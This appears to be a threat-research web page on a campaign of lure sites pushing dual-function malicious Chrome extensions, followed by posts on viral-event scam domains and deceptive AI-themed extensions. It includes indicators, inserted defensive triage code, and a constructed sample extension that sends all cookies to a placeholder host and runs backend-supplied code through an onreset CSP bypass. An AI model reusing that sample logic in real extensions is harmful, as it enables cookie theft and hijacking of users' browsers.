An unknown actor has been continuously creating malicious Chrome browser extensions since approximately February 2024. The actor builds websites that masquerade as legitimate services (productivity tools, ad and media creation or analysis assistants, VPN services, crypto, banking and more) to direct users to install corresponding malicious extensions from Google’s Chrome Web Store (CWS). The extensions typically have dual functionality: they generally appear to work as advertised, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code.

Example: a DeepSeek Chrome Extension themed lure website, ‘deepseek-ai[.]link’

The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor controlled domains.

While each extension was found to be relatively different, the hosting infrastructure and code structures were consistent. Multiple extensions were observed using a “onreset” event handler trick on a temporary document object model (DOM) element to execute code, likely to bypass content security policy (CSP). The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js” or for older extensions “src/pages/background/index.js.” These files were also found to typically contain the majority of the malicious functionality of the extensions.
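A static triage pass for the traits just described (excessive permissions, a hard-coded backend in background.js / background.iife.js, the onreset trick, bulk cookie reads, dynamic declarativeNetRequest rules, code staged through chrome.storage.local and pushed via chrome.tabs.sendMessage), written as an added example for this page; it is not code from the extensions or from the research. It runs over an unpacked extension as a {path: content} map so it works offline, and includes a constructed mini-extension that mirrors the structure above; the backend host and API key in that sample are placeholders, not indicators from the report. The same function also flags hard-coded third-party API keys, which the research notes elsewhere on this page.

```python
"""Static triage of an unpacked Chrome extension for the traits described above.

Added example for this page; not code from the extensions or the research.
SAMPLE_EXTENSION is a constructed mini-extension ({path: content}); its backend
host and API key are placeholders, not real indicators.
"""
import json
import os
import re

RISKY_PERMISSIONS = {
    "cookies": "read every site's cookies",
    "scripting": "inject script into pages",
    "declarativeNetRequest": "block/redirect/rewrite requests via rules",
    "webRequest": "observe requests (MV3: observational only)",
    "tabs": "enumerate and target tabs",
    "storage": "stage received code locally",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
CODE_PATTERNS = [  # (regex, tag); reported per file so each hit can be pivoted on
    (r"\b(?:wss?|https?)://([A-Za-z0-9.-]+)", "hardcoded backend host"),
    (r"chrome\.cookies\.getAll\(", "bulk cookie read"),
    (r"declarativeNetRequest\.updateDynamicRules\(", "dynamic net rules pushed from backend"),
    (r"chrome\.tabs\.sendMessage\(", "pushes data/code to content scripts"),
    (r"chrome\.storage\.local\.(?:set|get)\(", "stages payload in local storage"),
    (r"setAttribute\(\s*['\"]onreset['\"]", "onreset event-handler execution trick"),
    (r"\bnew Function\(|\beval\(", "direct dynamic code evaluation"),
    (r"(?i)\b(?:api[_-]?key|apikey|token)\s*[:=]\s*['\"][A-Za-z0-9_\-]{16,}['\"]", "hardcoded third-party API key"),
]
REMOTE_CONTROL_TAGS = {"pushes data/code to content scripts", "stages payload in local storage",
                       "dynamic net rules pushed from backend", "direct dynamic code evaluation",
                       "onreset event-handler execution trick"}


def triage_extension(files):
    """files: {relative path: text}. Returns findings plus a low/medium/high verdict."""
    manifest = json.loads(files["manifest.json"])
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | {
        m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])}
    if manifest.get("manifest_version", 3) < 3:        # MV2 kept host patterns in permissions
        hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    broad = bool(hosts & BROAD_HOSTS)

    findings, backends, tags = [], set(), set()
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        for pattern, tag in CODE_PATTERNS:
            for m in re.finditer(pattern, text):
                tags.add(tag)
                findings.append({"file": path, "tag": tag, "match": m.group(0)})
                if tag == "hardcoded backend host":
                    backends.add(m.group(1))

    # High = broad reach + a way to act on it + somewhere to take orders from.
    reach = broad and bool({"cookies", "scripting", "declarativeNetRequest"} & perms)
    remote = bool(backends) and bool(tags & REMOTE_CONTROL_TAGS)
    verdict = "high" if reach and remote else "medium" if reach or remote else "low"
    return {"risky_permissions": {p: RISKY_PERMISSIONS[p] for p in perms if p in RISKY_PERMISSIONS},
            "broad_host_scope": broad, "backends": backends, "tags": tags,
            "findings": findings, "verdict": verdict}


def triage_directory(root):
    """Run the same triage on an unpacked .crx directory (manifest.json at top level)."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith((".js", ".json")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
    return triage_extension(files)


SAMPLE_EXTENSION = {  # constructed; mirrors the structure the research describes
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "site-stats (constructed sample)",
        "permissions": ["cookies", "storage", "scripting", "declarativeNetRequest", "webRequest", "tabs"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.iife.js"},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
    }),
    "background.iife.js": (
        'const API_KEY="0123456789abcdefghijklmn";\n'   # placeholder third-party key
        'const ws=new WebSocket("wss://api.backend-placeholder.invalid/api");\n'
        'ws.onmessage=async e=>{const m=JSON.parse(e.data);\n'
        ' if(m.cmd==="cookies"){const c=await chrome.cookies.getAll({});ws.send(btoa(JSON.stringify(c)));}\n'
        ' if(m.cmd==="rules"){chrome.declarativeNetRequest.updateDynamicRules({addRules:m.rules});}\n'
        ' if(m.cmd==="exec"){await chrome.storage.local.set({report:m.code});chrome.tabs.sendMessage(m.tab,{run:1});}};\n'
    ),
    "content.js": (
        'chrome.runtime.onMessage.addListener(async()=>{const {report}=await chrome.storage.local.get("report");\n'
        ' const el=document.createElement("input");el.setAttribute("onreset",report);el.dispatchEvent(new Event("reset"));});\n'
    ),
}

if __name__ == "__main__":
    result = triage_extension(SAMPLE_EXTENSION)
    print(result["verdict"], sorted(result["tags"]), sorted(result["backends"]))
```

The backend list deliberately includes every host found, legitimate third-party APIs too, because the dual-function extensions above talk to both; the analyst's job is to separate the advertised service's endpoint from the one that only ever receives pings and reports.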

Registration Patterns for Actor Lure Websites

Common registration patterns were observed going back to October 2024.

  • Registrar: NameSilo, LLC
  • NameServer: cloudflare.com
  • IP ISP: CloudFlare Inc.
  • SSL Issuer Common Name: WE1
  • Registrant: Domain Administrator
  • Server Type:
    • cloudflare
    • proxygen-bolt
  • MX Server: cloudflare.net

Additionally, Facebook tracking IDs were commonly reused across the lure sites.

  • Facebook ID
    • 2696720993868113
    • 416208351532463
    • 312497404888286
    • 993764766100733
    • 2901646833326404
    • 541163625350468
    • 965666115394891
    • 1151077320148683

[Screenshot: a sampling of the lure websites, which cover a wide range of topics and themes] The full list of identified domains is provided on GitHub.

Malicious Extensions

It’s worth noting that the extensions appear to be at least partly functional relative to the theme of their lure. However, where an extension relies on a third-party service for that functionality, such as FortiVPN or DeepSeek AI, it hard-codes the third-party API key into the extension code, an extremely poor security practice.

Example 1: Lure Site of Manus AI to Install an AI Assistant Extension

Lure Domain: manusai[.]sbs

Extension Name: manus-ai-free-ai-assistan

Extension ID: aeibljandkelbcaaemkdnbaacppjdmom

CWS:  https[:]//chromewebstore.google[.]com/detail/manus-ai-free-ai-assistan/aeibljandkelbcaaemkdnbaacppjdmom

Extension Filename: aeibljandkelbcaaemkdnbaacppjdmom.crx

Extension File Sha256: 3131d15ebea5eb68e636eb804b2de86cc04d8be5d1257c83f2042a391b8e9415

Actor API Domain: api.sprocketwhirl[.]top

The first thing to note about the extension is the extensive set of permissions it requests in its manifest.json file.

The “background.js” script fetches and applies declarativeNetRequest rules from the backend. This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking.

The background script communicates with api.sprocketwhirl[.]top, sending encrypted system information (platform, language, memory, cores, timezone, IP, country code) and receiving dynamic declarativeNetRequest rules and potentially executable code.

The content script (injected into all pages) executes arbitrary code retrieved from chrome.storage.local (report key), which was placed there by the background script after fetching it from api.sprocketwhirl[.]top.

Example 2: Lure Site of FortiVPN Client Extension

Lure Domain: forti-vpn[.]com

Extension Name: fortivpn

Extension ID: ccollcihnnpcbjcgcjfmabegkpbehnip

CWS: https[:]//chromewebstore.google[.]com/detail/fortivpn/ccollcihnnpcbjcgcjfmabegkpbehnip

Extension Filename: ccollcihnnpcbjcgcjfmabegkpbehnip.crx

Extension File Sha256: f4fe36cdc9bd1f16d9385e56155aca3723a267bcdf575e925e20bb9a6526b576

Actor API Domain: api.infograph[.]top

The extension likewise requests extensive permissions, as seen in its manifest.json file.

The extension has dual functionality: it provides some of the advertised purpose, in this case a browser-extension-based VPN service, by connecting to wss[:]//leviathan.whale-alert[.]io/ws with a hard-coded API key. At the same time, however, it also connects to a malicious backend at wss[:]//api.infograph[.]top/api and listens for commands, using a WebSocket keep-alive mechanism to maintain connectivity to the backend server and sending periodic ping and report messages.

When commanded, it uses chrome.cookies.getAll({}) to retrieve all browser cookies, compresses them using pako, encodes them in Base64, and sends them back to the backend infograph[.]top server.

It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user’s traffic through malicious servers. The proxy target is provided by the backend command and also implements proxy authentication handling.

The extension fetches arbitrary scripts from an actor-controlled server. It then injects the scripts into active browser tabs by using chrome.tabs.sendMessage to the tab’s content scripts, triggering their execution within the tabs.

Additionally, the extension enables dynamic network rules: the setup response from the backend can contain declarativeNetRequest rules, which are then applied, allowing the backend to modify network traffic post-install.

Example 3: Lure of SiteStats Extension

Lure Domain: sitestats[.]world

Extension Name: site-stats

Extension ID: fcfmhlijjmckglejcgdclfneafoehafm

CWS: https[:]//chromewebstore.google[.]com/detail/site-stats/fcfmhlijjmckglejcgdclfneafoehafm?pli=1

Extension Filename: fcfmhlijjmckglejcgdclfneafoehafm.crx

Extension File Sha256: d6e179dcab901e81b3340aebaa3e517bb98b09f9fea01e667e594416c10efc44

Actor API Domain: api.zorpleflux[.]top

Like the previous examples, this extension also grants itself extensive permissions and script execution on every site as seen from its manifest.json file.

The extension can modify network requests via declarativeNetRequest rules. It also has access to the webRequest API, which is primarily observational in Manifest V3, but combined with broad host permissions it can still be used for tracking or reconnaissance.

Similar to the other extensions identified, it connects to an actor-controlled backend server, api.zorpleflux[.]top, defined in the “background.iife.js” file. It also sends periodic ping and report messages to the backend server.

It is capable of setting up a secondary proxy WebSocket connection, allowing traffic routing via the user’s browser, commanded by the backend. It implements a reverse proxy functionality by handling proxied requests via fetch, compressing responses with pako, and relaying back to the backend.

The extension also executes arbitrary scripts received from the backend server, using chrome.tabs.sendMessage to pass them to the content script declared in the manifest.json file for execution.

Actor API Endpoints

The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js.” For example, the lure site deepseek-ai[.]link directs users to install the Chrome extension with ID “pocfdebmmcmfanifcfeeiafokecfkikj.” Upon installation, this extension actively communicates with another actor domain, api.glimmerbloop[.]top, to report installation/fingerprinting data and receive instructions/payloads.

Many of the analyzed extensions had variations in functionality and implementation of the API payload execution steps including what browser fingerprinting information was sent in the initial transaction. The following were consistent elements observed:

  • Hardcoding actor API domain in “background.js” or “background.iife.js” file
  • Use of HMAC with SHA-256 signing algorithm
  • Use of JWT authentication
  • Use of extension ID in UTF-8 bytes format as a secret key to sign the JWT payload
  • Base64 encoding the payload prior to sending to the API server

To establish a connection to the actor’s API server, the extensions create a token using a standard JWT library that combines a UUID, the extension ID, version, and country code. The standard JWT claims (Issued At, Expiration Time) are added to the payload, and the token is signed with the HMAC-SHA256 algorithm. The secret key used for signing was consistently observed to be the UTF-8 bytes of the extension ID string. The resulting token is then Base64 encoded using btoa() and sent to the API server as an authentication mechanism to retrieve arbitrary code for the extension to execute.

The domain registration details of the API endpoints were found to be nearly identical to those of the malicious lure websites with the additional commonalities in website title and content.

  • Website Title: SiteName
  • Website Content:

A pivot on these domain registration patterns identified the domains provided at the end of this post, suspected to be owned by the actor and used by malicious extensions. Analysis of several extensions identified hard coded domains that were all found to be in the list of identified API domains, further validating the findings.

Fake Websites and Malicious Chrome Extensions

Since at least February 2024, this malicious actor has deployed over 100 fake websites and malicious Chrome extensions with dual functionalities. Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises.

Notably, the Chrome Web Store has removed multiple of the actor’s malicious extensions after malware identification. However, the actor’s persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements. Malware distributors such as this often exploit current trends, such as the recent DeepSeek AI media attention, to lure users into installing infected extensions, potentially gaining control over their browsing activity and sensitive data.

All users should protect themselves by exercising caution when installing extensions. Stick to the Chrome Web Store and verified developers, carefully review requested permissions, read reviews, and be wary of lookalike extensions. Keep your browser and antivirus software updated, and regularly review your installed extensions, removing any you don’t need or find suspicious. Vigilance is key to avoiding these threats.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensions

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Learn More
Research
Scams and Malicious Domains Emerging from Breaking News

In the fast-paced digital landscape, viral media events capture global attention. From natural disasters and geopolitical shifts to groundbreaking tech releases and cultural phenomena, these moments dominate headlines and online conversations. But as the world's eyes turn towards these events, a different group also takes notice: malicious actors looking to capitalize on the public's interest and urgency.

Our security research team recently undertook a project to identify and analyze scam and malicious domains and websites that emerge in the wake of high-profile viral media events. Leveraging AI-driven research capabilities, we aimed to understand how threat actors exploit these moments for financial gain and other nefarious purposes.

AI-Powered Approach to Identify Viral Media Events

Our research methodology involved using AI to first identify viral media events that occurred between January 1, 2025, and the present. The AI research capability was prompted to pinpoint the approximate start, peak, and end of each event's virality across mass media and wide coverage.

For each identified event, we then tasked the AI with generating a list of keywords likely to appear in domain names or website titles seeking to associate with the event. The prompt for keyword generation was specifically designed to identify terms that scammers might use to create deceptive sites.

We sampled multiple event topics from the AI's output for deeper analysis, including the Los Angeles Fire, "NoKings," DeepSeek / China AI developments, the ongoing Trade War, and the Ukraine/Russia conflict.

An example of the AI's output for a significant tech event is as follows:

example of AI's output for a significant tech event

By searching for these keywords or similar terms in domain registrations and website titles within the estimated first and last observed timeframes, we detected several domains that appeared to be malicious. It was anticipated that most scam-related or malicious domains would emerge around the peak of viral activity and potentially persist until the latest observed dates. 

A sampling of the malicious findings from the AI-generated keywords for the “Deepseek AI Release & Market Impact” event are shown below.

Malicious Browser Extensions
Windows Trojan Delivery
Fake DeepSeek Meme Coins

BeInCrypto reported similar-looking sites marketing a fake DeepSeek meme coin.

Multiple scams were identified. Perhaps the most financially successful ones relating to the DeepSeek event were fake cryptocurrency meme coins created to capitalize on a growing trend of novice investors looking for the next hyped-up moonshot meme coin. In the case of DeepSeek, according to BeInCrypto (cited in the table above), fake meme coins accrued over 46 million dollars’ worth before the rug was pulled, presumably indicating the scammers had cashed out.

Additionally, multiple malware delivery websites were observed primarily delivering Windows trojans and malicious browser extensions. One extension in particular was observed with capabilities to legitimately use DeepSeek API for working functionality, but also connected to a remote domain to retrieve and execute arbitrary JavaScript files likely for the purpose of credential harvesting or session hijacking.

Expected vs. Actual Findings Regarding Viral Events

Based on the nature of viral events, we anticipated finding websites and domains attempting to:

  • Amplify or create spin-off movements to gain attention.
  • Sell merchandise related to the event.
  • Collect user information (contact details, experiences, etc.) for spam, resale, or phishing.
  • Push deceptive or derisive narratives to further enthral individuals in alleged movements, leading to potential merchandise sales, information gathering, or fraudulent donations.
  • Act as "ambulance chasers," with alleged law firms soliciting victims of tragedies for potential profit.
  • Deliver malware, adware, or spyware through deceptive downloads.

While we did observe instances of these expected tactics, our research consistently revealed a predominant motivation across the sampled events: direct financial profit.

For almost all events sampled, we identified websites explicitly seeking to profit by:

  • Claiming to be part of a legitimate donation foundation supporting the cause (e.g., for the LA Fire, the Ukraine/Russia conflict, and other tragedies like the Myanmar earthquakes).
  • Selling merchandise related to the event topic.
  • Creating and promoting meme cryptocurrency coins based on the event.

Beyond direct financial scams, we also confirmed the presence of websites designed for:

  • Malware delivery.
  • Information collection schemes.
  • Disinformation campaigns aimed at pushing deceptive and derisive narratives.

Emerging Patterns and Linked Actors Across Viral Events

A significant observation was the emergence of common elements across multiple relatively unique-looking websites covering different viral events. This suggests the likelihood of the same actor or group being behind these diverse scams.

One example was websites that appeared to create meme cryptocurrency coins in response to several highly publicized events in the recent US political landscape and natural disasters, including US tariffs, the trade war, and the LA fire. Several of these seemingly distinct scam sites appeared to share design, language, or infrastructure elements, which points towards a connected operation.

One suspected cluster focused on scam meme coins commonly used IP ISP: Vercel Inc, Registrar: Namecheap, SSL Issuer CN: R10 or R11, and commonly had website titles with a meme coin name in all caps such as LAFIRE, $LAFIRE, GROK and TOOT. Pivots from this pattern identified several other suspected scam meme coin websites including $TittsFart, $TUCHI, $TOOT, $GWOK, and $SUNG, the last a meme of Sung Jinwoo, the main character of the popular anime show Solo Leveling.

The most prevalent scams observed were those pushing newly created cryptocurrency meme coins, which attracted novice traders seeking to ride the hype of the viral event to make easy money. Once the meme coin reaches a certain threshold of time or sale price, the scammers would cash out selling all of their coins and the meme coin would subsequently collapse. These meme coin scams were observed in a wide range of events including international conflicts such as the Russian attacks on Ukraine, the US Trade War, the LA Fire, and the Myanmar Earthquake. 

The following are example findings of similar websites, each associated with inactive social media accounts that claim to sell cryptocurrency coins linked to widely publicized media events.

tradewar[.]space, tradewar[.]lol, tradewar[.]site attempt to persuade others to purchase Trade War themed cryptocurrency coins.

lafirebrigade.co[.]uk and lafireonsol[.]xyz attempt to persuade others to purchase a LA Fire-themed cryptocurrency coin.

lafire[.]io is another website attempting to pawn off scam crypto coin LAFIRE as a donation fund tactic. 

myanmarmeme[.]top promotes a Myanmar-themed meme coin.

tootonsol[.]xyz

gork[.]ink, a suspected scam meme coin site, attempted to capitalize on the recent news hype around the Elon Musk-owned xAI Grok AI model. Decrypt reported that the alleged scam meme coin achieved $160 million in market capitalization before crashing.

The second most prevalent scam tactic observed involved fake donations, sometimes masquerading as established entities such as the American Red Cross, World Food Program or LA Fire departments.

Specifically relating to the LA fire event, BforeAI published a report highlighting a similar method of identifying these types of scam domains in which a variety of websites were identified. Their report also noted multiple consistencies in the types of domains and websites being created in the aftermath of natural disasters.

lafirevictimsupport[.]com and lafireonsol[.]xyz purported to collect donations on behalf of the American Red Cross.

donorsee-charitable[.]com is a cryptocurrency donation scheme for Myanmar earthquake victims purporting to be part of the World Food Program (WFPUSA).

Malicious Actors Leveraging Viral Media Events for Financial Gain

Our research highlights the clear and present danger posed by malicious actors who quickly leverage viral media events for their own gain. The speed at which these events unfold provides a fertile ground for scammers to deploy a variety of schemes primarily focused on financial exploitation through fake donations, merchandise sales, and cryptocurrency scams. The observed connections between scam sites operating across different viral topics underscore the adaptive and potentially organized nature of these threat actors.

Staying vigilant and critically evaluating any website or domain seeking engagement related to a viral event is crucial. Always verify the legitimacy of organizations, especially those requesting donations or personal information, and be wary of unsolicited offers or urgent calls to action tied to breaking news. As security researchers, we will continue to monitor this evolving threat landscape and share our findings to help the public stay safe online.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Learn More
Research
Deceptive Browser Extensions within the Google Store: A Study in AI Slop

Like any garden, the digital landscape experiences the emergence of unexpected blooms. Among the helpful flora of browser and application extensions, some appear with intentions less than pure. These deceptive ones, often born from a fleeting desire for illicit gain or mischievous disruption, may possess a certain transient beauty in their ingenuity. They arrive, sometimes subtly flawed in their execution, yet are driven by an aspiration to infiltrate our digital lives, to harvest our data, or to simply sow chaos.

We see them not in complete, monolithic forms, but in their evolving iterations. A small crack in their initial design might be patched in the next update, a vulnerability exploited and then hastily concealed. Their existence is a dance of adaptation, a response to the ever-watchful gaze of security systems. They are, in a sense, perfectly imperfect – their flaws often intertwined with the very mechanisms that allow them to function, however briefly.

On the other side of this digital ecosystem reside the forces of security and risk awareness. These are the gardeners, constantly tending to the health of the digital space, pruning away the harmful growths. Security measures, with their own imperfections and constant striving for improvement, represent the human desire for safety and control. Risk, then, is the shadow cast by these deceptive extensions, a reminder of the potential cost of their transient existence – the loss of privacy, the compromise of personal information, the erosion of trust in the digital tools we rely upon.

The human experience at the heart of this is one of vulnerability and resilience. We, the users, navigate this landscape, often unaware of the subtle battles being waged. We place our trust in the extensions we install, hoping for enhanced functionality or convenience. When that trust is betrayed by a deceptive app or extension, it leaves a mark, a subtle crack in our digital confidence. 

This story is a reminder that the digital world, like the natural one, is in constant flux, and our experience within it is shaped by this delicate and ever-shifting balance between aspiration and risk, between the fleeting beauty of innovation and the enduring need for security.

Browser Extensions’ Security Risk

Browser extensions can pose a security risk to individuals and organizations. Data from the user’s browser or inputs to the extensions can be sent to third parties who may not practice effective security measures to protect user data and privacy. This report highlights a network of approximately 20 newly registered websites intended to lure people to install new browser extensions from the Google Store. The domains and extensions were likely created by a single author, which exhibit patterns of deceptive practices and potential security risks. While the extensions do not display overtly malicious behavior, their design choices raise concerns regarding user privacy and data security.

The Network and Its Characteristics:

The extensions, available on the Google Chrome Web Store, share several common traits:

Manipulated Ratings: All extensions employ a deceptive rating system, funneling positive reviews to the Chrome Web Store while discarding negative feedback.

External Data Transmission: Some extensions, particularly those offering AI-powered features, transmit user data to domains owned by the author. This includes chat history, input data, and potentially sensitive information.

Misleading Branding: Certain extensions use misleading branding, falsely associating themselves with well-known services (e.g., "DeepSeek AI").

Functional Diversity: The extensions offer a range of functionalities, including AI writing and ad creation tools, URL shortening, PDF to JPG conversion, and AI chatbots.

Security Researcher's Guide: Investigating Suspicious Browser Extensions:

Investigative Steps:

  • Initial Observation:
    • Note the extension's stated functionality and its perceived utility.
    • Examine user reviews for consistency and authenticity. Be wary of overwhelmingly positive reviews with limited negative feedback.
    • Record the developer's name and any associated websites or domains.
  • Extension Retrieval:
    • Obtain the Extension ID: Locate the extension on the Chrome Web Store or via a URL from a website directing users to download the extension.
    • Download the Extension: Use a tool like chrome-stats[.]com to download the extension's .crx file.
    • Unpack the Extension: One method is to use a file archiving tool (e.g., 7-Zip) to extract the contents of the .crx file.
  • Analyze the Files:
    • Examine the manifest.json file for permissions requests and service worker details. Pay attention to permissions that seem excessive for the extension's stated functionality.
    • Analyze Javascript files for suspicious code, external API calls, and data transmission patterns. Look for obfuscated or unusual code that may warrant further investigation.
    • Review the Domains: Research the domains that the extension uses, and be suspicious of generic or unknown domains. Assess the domain's registration information, hosting provider, and overall reputation.
  • Data Flow Assessment:
    • Identify the types of data being transmitted and the purpose of the transmission. Evaluate the security and privacy implications of the data transmission.
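The “Analyze the Files” step above can be partly automated. The triage helper below is an added example written for this guide (not DomainTools code): it takes the parsed manifest.json and the text of the background script of an unpacked extension and returns the findings an analyst would follow up on. The list of “risky” permissions and the sample manifest are this example’s assumptions; the domain string in the sample background script is taken from the post’s SiteStats example, and nothing here contacts it.

```javascript
// Added example (not DomainTools code): static triage of an unpacked extension.
// Input: parsed manifest.json object + background script source as a string.
// Output: list of findings {kind, detail} for an analyst to review.

// Assumed list of permissions that are excessive for a simple utility extension.
const RISKY_PERMISSIONS = new Set([
  'cookies', 'scripting', 'declarativeNetRequest', 'declarativeNetRequestWithHostAccess',
  'proxy', 'webRequest', 'tabs', 'storage', 'debugger',
]);

// True for match patterns that cover every site: <all_urls>, *://*/*, http(s)://*/*
function isAllSites(pattern) {
  return pattern === '<all_urls>' || /^(\*|https?):\/\/\*\/\*$/.test(pattern);
}

function triageExtension(manifest, backgroundSource) {
  const findings = [];

  const perms = manifest.permissions || [];
  const risky = perms.filter(p => RISKY_PERMISSIONS.has(p));
  if (risky.length) findings.push({ kind: 'risky_permissions', detail: risky });

  const hosts = manifest.host_permissions || [];
  if (hosts.some(isAllSites)) findings.push({ kind: 'host_all_sites', detail: hosts });

  // Content scripts injected into every page are what let a fetched payload run anywhere
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some(isAllSites)) {
      findings.push({ kind: 'content_script_all_sites', detail: cs.js || [] });
    }
  }

  // MV3 service worker file: where the post saw the actor's API domain hardcoded
  const sw = manifest.background && manifest.background.service_worker;
  if (sw) findings.push({ kind: 'background_worker', detail: sw });

  // Hostnames referenced from the background script over http(s) or ws(s)
  const urlRe = /\b(?:https?|wss?):\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  const domains = new Set();
  for (const m of backgroundSource.matchAll(urlRe)) domains.add(m[1].toLowerCase());
  if (domains.size) findings.push({ kind: 'hardcoded_domains', detail: [...domains].sort() });

  return findings;
}

// Constructed sample modelled on the traits the post reports: broad permissions,
// a content script on <all_urls>, and an API domain in the background worker.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'site-stats',
  permissions: ['storage', 'cookies', 'declarativeNetRequest', 'tabs', 'scripting'],
  host_permissions: ['<all_urls>'],
  background: { service_worker: 'background.iife.js' },
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};
const SAMPLE_BACKGROUND = `
const API = "wss://api.zorpleflux.top/api";        // constructed: backend endpoint
const REPORT = "https://api.zorpleflux.top/report"; // constructed: report endpoint
setInterval(() => ws.send(JSON.stringify({ type: "ping" })), 30000);
`;

function summarize(findings) {
  return findings.map(f => `${f.kind}: ${JSON.stringify(f.detail)}`).join('\n');
}

console.log(summarize(triageExtension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND)));
```

Domains it reports are leads for the “Review the Domains” step, not verdicts: a legitimate VPN or analytics extension will also name a backend, so registration data and reputation still have to be checked.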

Examples:

Deceptive Browser Extensions 1
Chrome Extension "DeepSeek AI Chat": Purports to add DeepSeek AI chat to your browser
Deceptive Browser Extensions 2
Links to Chrome Web Store on Google

An interested user might see the reviews are 4.8 stars and at least 1,000 users. Not an insubstantial number given the recent global proliferation of DeepSeek AI related apps in the past few months.

A closer look at the reviews shows 4 ratings.

Deceptive Browser Extensions 3



Domain: ai-chat-bot[.]pro

Google Store URL: https[:]//chromewebstore.google[.]com/detail/deepseek-ai-chat/jmpcodajbcpgkebjipbmjdoboehfiddd

Extension ID: jmpcodajbcpgkebjipbmjdoboehfiddd

Filename: jmpcodajbcpgkebjipbmjdoboehfiddd.crx

Sha256: aa6901e5a6dcfae8cca4b06278fd3ed2e429e8ec29bb3ca39e0dd1cd428320e2


The extension's core functionality involves capturing user input and the entire ongoing chat history, then transmitting this data to an external server (ai-chat-bot[.]pro) with every message sent by the user. This presents a significant privacy risk, as potentially sensitive conversation data is processed by an unverified third party.

Excerpt From deepseek_ai_chat_front.js Called By deepseek_ai_chat_page.html

Common among all the observed extensions by this author is code that includes a rating widget that actively filters user feedback. Users providing low ratings (1-3 stars) are redirected to a private feedback form on the ai-chat-bot[.]pro domain, while users providing high ratings (4-5 stars) are sent to the official Chrome Web Store (CWS) review page. This artificially inflates the extension's public rating and violates CWS policy.

Excerpt From deepseek_ai_chat_rating.js

A background script directs users to pages hosted on the same suspicious ai-chat-bot[.]pro domain upon extension installation (welcome page) and sets it as the target URL upon uninstallation. This allows the external server to track install/uninstall events.

Excerpt From: deepseek_ai_chat_bg.js

The code opens a new tab that loads the following page:

This page then sets multiple Yandex tracking cookies without permissions and retrieves browser information from the user.

Even without overtly malicious intent, the observed review manipulation and external transmission of the user’s IP, browser information and associated chat history raise concerns. This grants the website owner access to sensitive user interactions, a potentially serious issue given the increasing data leakage associated with AI productivity tools. The rapid adoption of AI integrations, facilitated by accessible browser extensions, can lead to a gradual erosion of security practices as users develop a false sense of trust. This "out of sight, out of mind" mentality risks exposing sensitive data, such as code, personal searches, and AI chatbot inputs, to malicious third parties who may engage in eavesdropping, data selling, or exploitation.

Looking For More: Domain Registration Patterns

  • IP Resolved: 164.90.199[.]205
  • IP ISP: DigitalOcean LLC
  • Use Yandex Trackers: 99419511 / 99794673 / 99764413
  • Registrar: Porkbun LLC
  • SSL Issuer: R10 /  R11
  • NameServer Domain: messagingengine[.]com
  • Server Type: Apache/2.4.52 (Ubuntu)
  • MX Domain: messagingengine[.]com


Domain: ai-sentence-rewriter[.]com
Extension Name: ai-sentence-rewriter
Extension ID: ihdnbohcfnegemgomjcpckmpnkdgopon

Domain: pdf-to-jpg[.]app
Extension Name: convert-pdf-to-jpg
Extension ID: oeefjlikahigmlnplgijgeeecbpemhip

Domain: htmlvalidator[.]app
Extension Name: html-validator
Extension ID: aofddmgnidinflambjlfkpboeamdldbd

Domain: email-checker[.]pro
Extension Name: email-checker-verify-emai
Extension ID: eheagnmidghfknkcaehacggccfiidhik

Domain: u99[.]pro
Extension Name: link-shortener
Extension ID: oliiideaalkijolilhhaibhbjfhbdcnm

AI Slop

"AI Slop" refers to low-quality, often generic and repetitive content, including text and images, generated by artificial intelligence, indicating a lack of human oversight and effort. In this case, the presence of many uniformly structured websites, each with minimal, repetitive content and duplicated code across their associated browser extensions, may suggest it is the product of AI Slop. The generic stock imagery, boilerplate text, and superficial explanations of extension functionality, align with the definition, indicating a potential reliance on automated AI generation rather than thoughtful development.

A Surge in AI Slop

Continuing our exploration of the digital landscape, we now see a new element stirring the garden: a surge of growth we might call "AI Slop." This refers to the rapidly increasing volume of apps and extensions, often born with the assistance of artificial intelligence, that flood the digital stores without the careful cultivation of thoughtful development, particularly around ethical considerations, privacy and security.

This influx amplifies the transient nature of the deceptive Chrome extensions we've discussed. AI tools can accelerate their creation and deployment, leading to a more rapid cycle of appearance, exploitation, and eventual detection. The digital garden becomes overgrown, making it harder to discern the true blooms from the weeds.

